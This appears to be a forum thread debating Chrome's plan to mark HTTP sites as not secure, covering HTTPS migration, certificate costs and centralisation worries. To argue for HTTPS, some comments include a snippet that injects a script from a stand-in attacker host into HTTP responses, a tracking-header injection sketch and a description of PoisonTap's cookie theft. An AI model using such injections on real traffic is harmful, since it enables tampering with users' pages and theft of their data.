Generally I hate these warnings because they are extremely stubborn while not really telling the user what could fix the problem. They also don’t explain why the error might show up today when everything was fine yesterday.
I’d much prefer a message like: “There is no way to verify that this site really is who it claims to be (possibly due to an expiration date, as sites must periodically renew their validations). The owner of the real site can resolve this error by using certification services such as LetsEncrypt. A secure connection is not possible until the site renews its validation.”.
The user in this case is a random web browser piloted by a non-technical person. It doesn't make any sense to try to arm them with technical solutions to the problem; that's the site owner's job.
What I find really interesting is that the website in question, oilandgasinternational.com, now has SSL on by default; it'll redirect you from any page if accessed over HTTP. Given that, perhaps we should just let them complain? It seems to raise awareness of the need for SSL.
Ironically, the thing stopping me moving my website to HTTPS is Google themselves!
There is no clear and unambiguous way to move my website from HTTP to HTTPS that GUARANTEES my rankings will not fall in the Google search index. This is because Google treats the HTTP and HTTPS versions of the same resource as separate pages.
Until they fix this, I'm sticking with HTTP. A drop in our search rankings would be a catastrophe.
I believe that sites that are served securely are ranked higher in Google search results, so you're actually ranked lower now than if you'd already gone through the process of securing your site.
Also, millions of sites have already secured themselves and survived just fine. I just don't know what you're worried about. Can you point to some links of this having been a problem for other websites?
I migrated a couple of my sites without any harm to rankings. Maybe a dip for a day while it all re-indexed. Best way to do it is to 301 to https it seems
Couldn't you have both, and wait till the https version starts to approach parity with the original? I'm imagining google would favor https over http in ranking, so over time it should rise
Two separate pages with the same content are penalised by Google; they are quite clear about that. I will switch on HTTPS tomorrow if Google makes it so that a protocol change does not affect search indexing. My business depends on this. Do a Google search and see all the people whose websites have been demolished by dropping out of the Google rankings after implementing HTTPS. Absurd!
There are a few well documented methods to counter that penalty: https://support.google.com/webmasters/answer/139066?hl=en. The easiest method is probably to configure your webserver to start sending 'rel=canonical' in a Link HTTP header, but it can also be done with a meta-tag.
You should only ever have a single canonical version of your content. Serve your stuff on one path and one path only, and everything else redirects to it.
The solution here is to serve on https and redirect http to it.
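A minimal nginx sketch of that setup (the domain and certificate paths are placeholders):

```nginx
server {
    listen 80;
    server_name example.com;
    # 301 preserves the request path and is the redirect crawlers expect
    return 301 https://example.com$request_uri;
}

server {
    listen 443 ssl;
    server_name example.com;
    ssl_certificate     /etc/letsencrypt/live/example.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/example.com/privkey.pem;
    # ...rest of the site config...
}
```

With the permanent redirect in place, search engines consolidate signals onto the https URLs rather than treating the two schemes as duplicates.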
Sorry if this is obvious, but have you set up Google Search Console for your domain? (aka Google webmaster tools) It helps with things like this. It has a "change of address" option.
Is there evidence that this is indeed the case? I've seen much FUD but no actual data that shows that a properly updated site (301 redirects, HSTS, robots.txt) is penalized.
In a way, that's already happening with wasm. I can't wait for a major language VM to be compiled to WASM and hosted on a common CDN (so it's likely to be cached). It's not such a pipe dream to imagine running high performance Python 3 or Java without the overhead of asm.js on the interpreter, but with the ease of running old fashioned JS.
This will reduce the diversity of information exchanged, as does ranking secure sites higher in search results. Privacy and security are worthy goals, but I do feel for those who are attempting to publish free information on personally run sites. The easiest thing to do is put Cloudflare in front of them which also has other benefits.
I have only ever made internal web apps that don't live on the internet. Where do I begin for an idiot's guide to switching to HTTPS? I want the shortest path to switching nginx over and getting an SSL cert. I think that's all I need to worry about?
Probably will be a very unpopular opinion, but while I appreciate that HTTPS encrypts traffic, I do think a mandatory HTTPS usage comes with a cost, not so much mentioned in this thread. Here's what I think:
I think the mandatory usage of HTTPS centralizes the already centralized web even further. HTTPS itself is secure theoretically, but at the same time it relies on:
1. Trust in browser vendors: Basically the way HTTPS works currently is that all browsers have "trusted certificate sources" hardcoded. And there aren't that many browsers out there with meaningful market share--Chrome, Firefox, Edge, Safari, and that's about it (One may even say it's pretty much Chrome all the way, with rest of them trailing far back)
2. Trust in the certificate authorities: The way HTTPS works relies on "trusted certificate sources", like verisign. This was already way too centralized, but it will become even more so. I'm guessing eventually companies like Google or Apple will start acting as generic certificate authorities (as a verisign competitor) unless regulators cut in.
If you think about the implication of all this, the more we move towards an "HTTPS first world", the more power these entities will have and the more damage it will cause when one of them gets compromised.
Note that the web has never been forced to use HTTPS throughout its entire history, so we have no idea how this will play out, and I'm just speculating based on my knowledge. HTTPS itself is secure, but as a lot of you know, most dangerous hacks come not from exploiting tech flaws, but from exploiting the weakest link in the value chain: the human factor. And when things become this centralized, the "human factor risk" becomes larger and larger.

We have never before had a world where HTTPS was forced, so it's not easy to visualize this or predict what will happen, but I can imagine many ways "the entire web can go down one day" because of the extreme centralization, and when I say "the entire web" I mean it literally. One day, some hacker will take advantage of the extremely centralized landscape of the web and probably be able to compromise the ENTIRE web, and you won't be able to browse all day until Apple, Mozilla, or Google releases a security update. This will be way worse than what we've experienced with S3 going down, because it will obsolete the security measures of ALL web browsers in one fell swoop.
Another thing I don't like about "forced HTTPS" is that it makes publishing to the web harder. You must either set up Let's Encrypt yourself to run your website, or, if that's too much of a hassle (which it would be for most people, even developers), just host your site on a service provider that already handles HTTPS.
This means people would rather publish their blogs on sites like medium.com than run their own WordPress server, or even a Ghost blog.
And when this happens, where do you think people will flock to? Most people will flock to platforms that are most stable and have high reputation, such as Google, Facebook, etc., which will centralize the web even further.
I may sound like a tin foil hat conspiracy theory guy but I just wanted to share my thought since everyone seems to think "You must be fucking crazy moron to think that there can be some drawbacks with a forced HTTPS future". Google does have every interest to move the web this direction because they already own the "centralized web", and the more centralized it becomes the more they benefit.
Just to reiterate, I do think HTTPS is great, and user privacy should be respected. I am just providing an alternative opinion.
> Another thing I don't like about "forced HTTPS" is that it makes publishing to the web harder. You must either set up Let's Encrypt yourself to run your website, or, if that's too much of a hassle (which it would be for most people, even developers), just host your site on a service provider that already handles HTTPS.
> This means people would rather publish their blogs on sites like medium.com than run their own WordPress server, or even a Ghost blog.
I think we'll just see the tools evolve. For example, Ghost's CLI install already sets up Let's Encrypt for you, along with auto-renewal of certificates; anyone using that or the 1-click DigitalOcean droplet gets HTTPS with no extra setup compared to a non-HTTPS version.
> You trust browser vendors pretty hard already since you're routing ALL of your information through them.
Yes, but just because we already do doesn't mean I don't have the right to resent that reality even more.
> I don't buy it. HTTPS reduces what you can do, not increase it. At most it can give a false sense of security but that's about it.
That's true. I wasn't arguing about what HTTPS can or cannot do; I was arguing about how centralized HTTPS is. No matter how safe a piece of technology is, the attack surface grows the more it is centralized. I've never been a fan of the reality we live in, where the core protocol is elegantly decentralized yet we still end up depending on centralized trust to be safe.
I think it's ridiculous that every existing website in the world needs to have a certificate authorized by a small number of entities.
Also another point I'm making is that people look at this move by Google and think "wow Google is really advancing the web!" but don't see their motivation behind it.
1. Google owns the "open web".
2. Enforcing HTTPS will make sure things become more centralized, which will make it easier for google to keep controlling the "open web".
3. Google profits.
I know this sounds like a conspiracy theory, but I'm just describing how the incentives line up; I can't think of another explanation for why HTTPS is being pushed this hard. It's important to distinguish this problem from the actual problem HTTPS solves, because I do think HTTPS itself is great.
I can see GoDaddy now rubbing their hands with glee as they ponder the prospect of selling overpriced server certificates to unaware website owners. No way they'll push a Let's Encrypt solution.
This. I already have clients purchasing SSL certificates from GoDaddy because of their aggressive FUD marketing. To make matters worse, GoDaddy doesn't assist in any way with the installation or activation of the SSL cert.
I just checked GoDaddy's prices, out of curiosity. "Plans starting at $59.99/yr".
For comparison, you can get a Comodo PositiveSSL cert for about $10/yr.
What is the modern simple and cheap way to set up a static HTTPS site with a custom domain? With HTTP this was doable with S3 for pennies a month; is S3+CloudFlare now the current price leader?
Replying to myself: it's distressing how many of the options assume command-line competence.
It used to be that graphic designers, photographers, families, etc. could set up a simple site with a shared host, an FTP client, and a bit of HTML. Now requiring HTTPS will push this further out of reach.
This content is now funneled into managed platforms: either free ones that monetize it (Medium, Flickr, Facebook, etc.) or more expensive, higher-touch services (SquareSpace, Wix, etc.). The de-democratization of the web continues.
Whatever company offers you FTP access and hosts those files over HTTP should be setting up HTTPS for you automatically, without any extra input from you. That's why all the instructions assume command-line competence: designers are not the target audience; sysadmins are.
If your host hasn't caught up with the times yet, it's very straightforward to get this for free (along with other benefits) from Cloudflare with a few clicks.
Generally agree with you... however, I'm a designer and I've had surprisingly positive experiences with AWS. I thought it was going to be highly technical and frustrating, but for basic static hosting AWS doesn't require any command-line skills; it's all point and click. You can even set up SFTP to your S3 bucket with something like Transmit from Panic (Mac). What you'll actually find yourself dealing with is AWS's confusing UX, understanding how all the AWS parts fit together (Route 53, CloudFront, etc.), and discoverability in their help documentation.
For a static site on AWS, you can easily set up S3 + CloudFront + Route 53 + free certificate from AWS Certificate Manager. My bill is around $1.07 per month.
Yes: the browser is not in control of resolving "localhost" to 127.0.0.1, nor of resolving 127.0.0.1 to the loopback interface. Those are details the OS handles, not the browser, so the browser can't know that http://localhost/ is "secure".
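To make the point concrete, here's a minimal Python sketch: the browser (like any program) just asks the OS resolver what "localhost" means and has no way to verify the answer, since /etc/hosts or the platform equivalent could map the name anywhere.

```python
import socket

# Name resolution happens in the OS resolver, not in the application.
# Nothing in this API proves that "localhost" is actually the loopback
# interface; the OS configuration is simply trusted.
addrs = {info[4][0] for info in socket.getaddrinfo("localhost", 80)}
print(sorted(addrs))  # typically loopback addresses, but nothing enforces that
```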
Looks like defamation to me. Just because a website doesn't have HTTPS doesn't mean it's not secure. It's not secure for some activities, and if the browser marks the whole page as not secure, that's defamation.
I don't care if the web would be better with every site having HTTPS. Chrome is saying something defamatory about websites without it.
This is going to be interesting. Instead of pushing everyone to HTTPS, I believe this will cause the average user to start ignoring the security warning. I see a security warning as a way to flag what's insecure, not as a catalyst to move to more secure methods.
Maybe Android Chrome could be worked on to not poop the bed quite so thoroughly when faced with a captive portal, then, if they're trying to get everybody onto https. Because the interaction between https, Android, and captive portals is just not a good scene.
As long as it doesn't break local development again, like their forcing of HTTPS on *.dev even when it's mapped locally in the hosts file. Funny enough, they suggest using .test, which is fine, except you can't use .test as a callback URL when setting up Google's OAuth... fail!
Right. HTTP/2 is only available with TLS, due to browser policies, so it necessarily requires TLS.
This means you need HTTPS if you want the performance wins of HTTP/2.
This doesn't mean HTTPS is a performance win if you're still on HTTP/1.1. That said, the performance overhead of TLS is negligible in practice.
Yes, so there are two major changes you'd need to get this performance benefit, not one, and if you just make the TLS change, your performance will (probably marginally) suffer, not improve. It's a bogus comparison.
Since the other examples don't appear to have convinced you, how about this one: https://samy.pl/poisontap/
Visit a single HTTP page while that's plugged in and it'll trigger an exploit that siphons all non-secure-flagged cookies off of every popular site that doesn't use HSTS (including the config pages of insecure routers on your LAN), and installs a persistent backdoor in them so the attacker can continue accessing data on those sites even after you're no longer being MITM'd. And that's not even using any zero-days; it's just exploiting the inherent vulnerabilities in non-secure HTTP.
(Note that while the site I linked talks about a USB device the same attack can be carried out by any MITM, like a WiFi router or upstream ISP; it's not exclusive to local attackers.)
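Since HSTS is what blocks the cookie-siphoning trick above, here's a hedged toy model of the mechanism: it is only a response header, but once a browser has seen it over HTTPS, the host is pinned and a MITM can no longer downgrade it to plain HTTP. (Real browsers also handle expiry, includeSubDomains, and preload lists; the host names are made up.)

```python
# Toy model of a browser's HSTS store.
hsts_pins = {}

def record_https_response(host, headers):
    # Browsers only honor Strict-Transport-Security when it arrives over HTTPS;
    # this sketch assumes the response did.
    if "max-age" in headers.get("Strict-Transport-Security", ""):
        hsts_pins[host] = True

def may_use_plain_http(host):
    # Once pinned, the browser upgrades every request to HTTPS internally.
    return not hsts_pins.get(host, False)

record_https_response("bank.example", {"Strict-Transport-Security": "max-age=31536000"})
```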
Yeah, the DHCP trick is what allows this particular method of conducting MITM via USB.
All the stuff it does _after_ becoming a MITM though are things that any MITM could do, regardless of how they became a MITM in the first place. (ARP spoofing, operating or compromising a Wi-Fi access point, etc.)
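A sketch of the one capability all of those MITM positions share: rewriting a plaintext HTTP response body before it reaches the browser. The attacker host and script name below are made up for illustration.

```python
# What any on-path attacker can do to an unencrypted HTTP response,
# regardless of how they became a MITM: splice a script tag into the body.
original = b"<html><head></head><body><p>Hello</p></body></html>"
inject = b"<script src='http://attacker.example/siphon.js'></script>"
tampered = original.replace(b"</body>", inject + b"</body>")
print(tampered)
```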
An example from the real world -- Comcast, a large ISP in the USA, has been caught injecting JavaScript into websites: https://thenextweb.com/insights/2017/12/11/comcast-continues... It's not hard to imagine a more malicious use, like tracking or injecting adverts the ISP wants you to see on webpages.
This is only possible because the connection isn't encrypted.
Another example -- Verizon were injecting a header called X-UIDH which had a unique identifier, acting as a super-cookie that was present on all websites and couldn't be removed: https://www.eff.org/deeplinks/2014/11/verizon-x-uidh
This is only possible because the connection isn't encrypted.
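A minimal sketch of the Verizon-style injection described above: a proxy that sees plaintext requests can stamp every one with the same tracking header before forwarding it. The token value here is a made-up placeholder, not a real X-UIDH value.

```python
# Hypothetical ISP-level proxy: tags every plaintext request with a
# per-subscriber identifier the user can neither see nor remove.
def isp_proxy(request_headers, subscriber_token):
    out = dict(request_headers)
    out["X-UIDH"] = subscriber_token  # same opaque ID on every site visited
    return out

tagged = isp_proxy({"Host": "example.org"}, "opaque-subscriber-id")
```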
All of that is bad, but none of it is a security issue. Privacy, sure; not security. And the article specifically shows that Google plans to mark example.org as insecure, which it's not.
insecure (adj.)
(of a thing) not firm or fixed; liable to give way or break.
not sufficiently protected; easily broken into.
A webpage loaded over HTTP is easy to tamper with. Let me give an example of HTTP traffic that is secure: apt repositories. You're only retrieving payloads protected by PGP, so the actual payload is firm, fixed, and not easily broken into.
How else do you define insecure? Have I misunderstood the definition?
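To illustrate the apt point: the bytes travel unencrypted, but a signed manifest (verified out of band with PGP) pins their hash, so tampering in transit is detectable even without TLS. This is a simplified sketch of that integrity check, not apt's actual code; the package bytes are made up.

```python
import hashlib

def verify(payload, expected_sha256):
    # The expected digest comes from a PGP-signed manifest (apt's Release
    # file), so a MITM who alters the payload can't forge a matching hash.
    return hashlib.sha256(payload).hexdigest() == expected_sha256

package = b"deb package contents fetched over plain HTTP"
pinned = hashlib.sha256(package).hexdigest()  # stands in for the signed value
```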
Insecure can't be used as a drop-in replacement for compromised, though; being insecure is what gets you compromised. One distinct thing leads to the other.
Your argument seems to be that because there are multiple ways to exploit people that closing any of those methods is not useful. I shouldn't have to explain why this is not a meaningful argument.
What I will say is that in many cases an attacker is far more capable of MITM than they are of posting forum comments, or otherwise convincing you to click a link. A phishing campaign is noisy - you are often alerting many parties that you're malicious. MITM within a network is much stealthier and you don't have to rely on users clicking on anything.
Really, they're just completely different attacks and the existence of one has no bearing on the other. TLS on every page would close off real attacks and, if it forced attackers to use noisy methods like phishing, that's a huge win.
Your assumption is that visiting example.com gets you the benign content from example.com, but without transport security ANY HTTP connection can be made to serve nasty malware.
I'm generally not worried about HTTP connections. Any random hyperlink I click on can produce those. However Ajedi32 made some very good points that being able to MITM HTTP connections can cause lasting issues, even for pages where the user is not intending to download anything, nor enter credentials.
Maybe someone could answer this for me, this discussion made me curious:
I have an old (2005) Mac, and my fav browser on it can't show https sites at all 90%+ of the time - "Cannot Load, Secure Connection Failed". (like the usual https sites linked to in HN stories) But it works fine with some https sites, e.g. github https, youtube, this page.
What is it about those 'working' https sites that makes them different? Hopefully that's enough info to answer that.
Ohh thanks guys. Yeah, I had a vague feeling my SSL (whatever that is) was outdated. So those sites just are more backwards-compatible. (Although github isn't backwards-compatible enough to actually make an account. I tried.)
I hate this. I too do a lot of off-line, never connected to the Internet devices and I don't want the god Google telling my users they're "not secure". My users know they're on a self contained network.
What are the best services out there today to translate a website from HTTP to HTTPS? Particularly for a static website. I have previously used Cloudfare's One-Click SSL free service, and I wasn't a big fan.
What about simple static sites like blogs that don't have forms? Do we really need to scare people away from our blogs, and do we have to get an SSL cert for them unnecessarily?
This has already been answered many times in this thread. Static sites are still vulnerable to MITM attacks and snooping over the network. Using HTTPS prevents this.
This is a really stupid move. There are plenty of instances where websites do not need to use HTTPS, like simple static websites for small businesses that do not collect personal user information. This is going to cause a lot of confusion and outrage when it is implemented.
This centralizes publishing rights to browser vendors & security cert vendors. I don't want to take permission from any third-party before publishing content on the web.
In any case, its rather rude of you to presume to know what people should think about this topic.
What login page? Your typical company website just has a few pages of text without any active elements. Forcing those to buy SSL certificates creates just another artificial barrier to entry.
So suddenly people will see lots of websites marked as insecure. They will stop paying attention to the warning, and when they do find a really insecure website, they will just use it anyway.
There is. Firefox Quantum is better than Chrome. The only thing is that Pushbullet doesn't quite show popups correctly. It works with all the major streaming services and just feels better. Now if only client-side window decoration would come sooner; I want to be rid of that ugly title bar. I miss Fedora's Firefox 57 build.
Unfortunately, the HTML inspector in Quantum is not as good as it used to be. I don't know why, but it often refuses to find the correct element. Firefox has been my main browser since Quantum, but for development I have to use Chrome or I'd go mad.
I'm sure they're going to fix that soon, but until then it's very frustrating. For example, while the site is loading there is no way to inspect the elements that have already loaded.
HTTPS helps secure traffic between two parties, but that has nothing to do with whether that end party (ahem, Google, or Equifax, ahem) is secure.
If we want real security we need to put cryptographic keys in P2P identities, so users control end-to-end everything they do. No middleman can tamper with it.
I believe most people are seeing this wrong; there are a few issues here.
1) Google is defining standards
This isn't driven by webmasters and users; it's big brother Google telling us what's good and what's bad, while they often fail their own standards. But hey, they get a pass and you don't.. no exceptions besides big G.
2) We’re focusing on SSL
This isn't about SSL; it's about point one.
3) misleading
A basic website that's just a random one-page HTML site doesn't need this at all. Yet the warning gives basic users (the ones we assume are too dumb to demand SSL) the idea that the site is not safe.
Real users think in two buckets: safe or not safe. They don't understand the gray area, and now we're telling them "Not Secure." A lot of people will read that as "not safe," and no one is around to tell them why the label appears; nobody in the real world reads a blog like this besides us.